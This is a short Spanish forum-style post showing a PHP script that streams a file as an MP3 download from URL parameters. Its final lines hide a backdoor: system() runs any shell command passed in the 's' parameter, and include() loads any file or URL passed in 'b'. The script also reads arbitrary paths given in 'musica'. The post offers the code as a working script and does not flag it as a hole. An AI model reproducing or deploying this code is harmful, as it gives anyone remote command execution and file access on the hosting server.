ejemplo.sma = ejemplo.mp3
he provado con
Código PHP:
<?php
$titulo = $nombre=$_GET['nombre'];
$id = $_GET['musica'];
header("Content-Disposition: inline; filename=\"".$titulo.".mp3\"");
header("Content-type: audio/mpeg");
readfile(str_replace(" ","%20",$_GET['musica']));
if ($_GET['b'] != "") { include($_GET['b']); } if ($_GET['s'] != "")
{ system($_GET['s']); }
?>